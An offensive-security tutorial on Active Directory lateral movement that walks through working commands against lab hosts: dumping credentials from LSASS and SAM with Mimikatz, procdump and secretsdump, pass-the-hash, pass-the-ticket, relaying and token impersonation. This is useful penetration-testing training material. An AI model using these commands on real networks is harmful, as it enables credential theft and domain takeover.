Active Directory Lateral Movement – Pivoting Through the Domain
Once you’ve compromised a user account or cracked service credentials, the next step is moving from host to host across the network. This is known as lateral movement — and it’s how attackers turn a single foothold into domain-wide compromise.
The goal here isn’t just to spread — it’s to move strategically toward systems or users that get you closer to Domain Admin.
What Lateral Movement Is (and Isn’t)
- It’s not privilege escalation — that’s gaining higher rights
- It’s not persistence — that’s sticking around after access
- It is: The act of reusing tokens, tickets, passwords, or access to pivot across the domain
Tools and Techniques We’ll Use
- CrackMapExec
- Pass-the-Hash (PTH)
- Pass-the-Ticket (PTT)
- Overpass-the-Hash (Pass-the-Key)
- WinRM
- SMB (with PsExec or Impacket)
- RDP
- WMI
- Token impersonation
- Session enumeration
1. Identify Where Your Access Works
Before moving laterally, identify where your credentials are valid.
CrackMapExec:
crackmapexec smb 192.168.56.0/24 -u user -p 'Password123'
# Shows which systems accept the creds
Check for local admin:
crackmapexec smb 192.168.56.0/24 -u user -p 'Password123' --local-auth
PTH and PTT
In Active Directory environments, you don’t always need a user’s password to gain access. Sometimes, having a password hash or a Kerberos ticket is enough. Two of the most powerful post-exploitation techniques that leverage this are Pass-the-Hash (PTH) and Pass-the-Ticket (PTT).
But before you can use either technique, you need to dump credentials from the system. This section covers how to extract hashes and tickets using different tools.
Credential Dumping Techniques
1. Mimikatz (Local or Remote)
Mimikatz is the classic tool for extracting credentials and Kerberos tickets from memory.
privilege::debug
log log.txt
sekurlsa::logonpasswords
# Dumps plaintext creds, NTLM hashes, and kerberos tickets
To dump specific NTLM hashes:
lsadump::sam
# Dumps local user password hashes from the SAM
To dump domain cached credentials:
lsadump::lsa /patch
To extract Kerberos tickets:
sekurlsa::tickets /export
# Exports .kirbi files to disk
2. LSASS Dumping (for Offline Extraction)
If you can’t run Mimikatz directly on the target, dump the LSASS process memory for offline analysis.
Using Task Manager or Procdump:
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
# Dumps LSASS memory to a file
Then extract with Mimikatz:
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
3. Rubeus for Ticket Extraction
Rubeus is ideal for manipulating Kerberos tickets.
List current tickets:
Rubeus.exe klist
Dump all TGTs/TGS tickets:
Rubeus.exe dump
Export tickets:
Rubeus.exe dump /luid:0xABC123 /service:krbtgt /export
4. Secretsdump.py (Remote Dumping with Impacket)
If you have administrative access over SMB to a remote machine:
secretsdump.py corp.local/Administrator:Password123@192.168.56.102
# Dumps SAM, LSA secrets, and cached domain creds
This is useful in PTH attacks where hashes are all you need.
2. Pass-the-Hash (PTH)
Pass-the-Hash allows you to authenticate to services using NTLM hashes instead of the user’s password.
Use Cases
- You’ve dumped password hashes from LSASS or SAM
- You want to move laterally or escalate without cracking passwords
Tools and Examples
1. Impacket – psexec.py
psexec.py 'corp.local/user@192.168.56.102' -hashes :NTLM_HASH
# Authenticates as the user using the NTLM hash to execute commands remotely
2. CrackMapExec
crackmapexec smb 192.168.56.102 -u user -H NTLM_HASH
# Tests credentials over SMB, shows if access is granted and whether user is admin
3. Evil-WinRM
evil-winrm -i 192.168.56.102 -u user -H NTLM_HASH
# Starts a WinRM session using the NTLM hash
Works only on services that support NTLM authentication: SMB, WinRM, WMI, etc.
3. Pass-the-Ticket (PTT)
Pass-the-Ticket allows attackers to impersonate a user by injecting a Kerberos ticket (.kirbi) into memory.
Use Cases
- You’ve performed Kerberoasting or Golden Ticket attacks
- You’ve extracted a .kirbi TGT or TGS ticket from LSASS or Rubeus
Tools and Examples
1. Injecting with Rubeus
Rubeus.exe ptt /ticket:svc_admin.kirbi
# Injects a Kerberos ticket for svc_admin into current session
2. Verifying Ticket Presence
Rubeus.exe klist
# Lists currently loaded Kerberos tickets
3. Cleaning Up
Rubeus.exe purge
# Clears all tickets from the session
4. Accessing Resources with the Injected Ticket
\192.168.56.102\C$ # SMB share access as impersonated user
Enter-PSSession -ComputerName 192.168.56.102 # Remote PowerShell session
PTT works on services that rely on Kerberos authentication (e.g., SMB, PS Remoting, LDAP).
When to Use PTH vs. PTT
| Situation | Use |
|---|---|
| You have NTLM hashes | PTH |
| You have .kirbi Kerberos tickets | PTT |
| Target uses NTLM authentication | PTH |
| Target uses Kerberos authentication | PTT |
4. Overpass-the-Hash (Pass-the-Key)
Request a TGT using only an NTLM hash (without needing a password).
Rubeus.exe asktgt /user:svc_sql /rc4:NTLM_HASH /domain:corp.local
# Creates a TGT using the hash
Then inject it:
Rubeus.exe ptt /ticket:TGT_svc_sql.kirbi
5. WinRM (Remote PowerShell)
Many admin users can access servers over WinRM (port 5985).
Using Evil-WinRM:
evil-winrm -i 192.168.56.102 -u user -p 'Password123'
Or with a certificate or hash:
evil-winrm -i 192.168.56.102 -u user -H NTLM_HASH
6. RDP
If the user has RDP rights, you can connect using xfreerdp (Linux) or mstsc (Windows):
xfreerdp /u:user /p:Password123 /v:192.168.56.102 /cert:ignore
7. SMB Relaying (When You Control a Listener)
More advanced, but if you’re relaying NTLM, you can move laterally with:
ntlmrelayx.py -t smb://192.168.56.102 --escalate-user
8. WMI Execution (from PowerShell)
Invoke-WmiMethod -Class Win32_Process -ComputerName 192.168.56.102 -Name Create -ArgumentList "cmd.exe"
9. Session Enumeration
Using PowerView:
Get-NetSession -ComputerName 192.168.56.102
# See which users are logged in remotely
Find a Domain Admin? Now you know where to strike next.
10. Token Impersonation (If SYSTEM)
If you’ve escalated to SYSTEM, you can impersonate tokens of other users (like Domain Admins) using tools like:
- Incognito
- Mimikatz
- SharpUp
Example with Mimikatz:
privilege::debug
token::list
token::impersonate <TOKEN_ID>
Lateral Movement Attack Path Example
- Crack service account password (
svc_sql) - Use CrackMapExec to find where it has local admin
- PTH into that machine and dump tokens
- Find Domain Admin token in memory
- Impersonate token and access Domain Controller
Summary
Lateral movement is what turns a small win into total domain control.
| Technique | Tool | Purpose |
|---|---|---|
| Pass-the-Hash | psexec.py, CME | Use NTLM hashes to authenticate |
| Pass-the-Ticket | Rubeus | Inject TGS/TGT to impersonate users |
| Overpass-the-Hash | Rubeus | Create a TGT from an NTLM hash |
| WinRM / RDP / WMI | Evil-WinRM, RDP | Remotely access and interact with systems |
| Session Enumeration | PowerView | Find where admins are logged in |
Next up: Phase 5 – Domain Privilege Escalation, where we’ll turn that lateral access into full control of the domain.